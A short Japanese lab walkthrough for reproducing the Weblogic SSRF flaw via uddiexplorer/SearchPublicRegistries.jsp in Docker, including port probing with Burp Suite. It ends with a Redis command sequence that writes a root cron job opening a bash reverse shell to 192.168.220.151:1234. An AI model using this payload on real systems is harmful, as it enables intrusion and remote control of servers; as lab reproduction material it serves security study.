Weblogic SSRF の脆弱性を再現する方法

1. docker を使用して環境を構築する

Docker のインストールと環境構築のチュートリアル: https://www.freebuf.com/sectool/252257.html

#アクセス ポート 7001

2. 脆弱性の再現手順

1. 脆弱性ページ/uddiexplorer/SearchPublicRegistries.jsp

2. IBM を確認します。

接続があることが判明したため、ssrf がある可能性があります。

3. burp suite を使用してキャプチャします

#4. オペレータ パラメータの接続を変更します

## 5. アクセス結果

#存在しないポートにアクセスすると、HTTP 経由で接続できませんでした。

#既存のポートにアクセスすると、ステータス コードが返されます

イントラネットにアクセスする

redis を使用してシェル ペイロードをリバウンドする

set 1 "\n\n\n\n* * * * * root bash -i >& /dev/tcp/192.168.220.151/1234 0>&1\n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save

以上がWeblogic SSRF の脆弱性を再現する方法の詳細内容です。詳細については、PHP 中国語 Web サイトの他の関連記事を参照してください。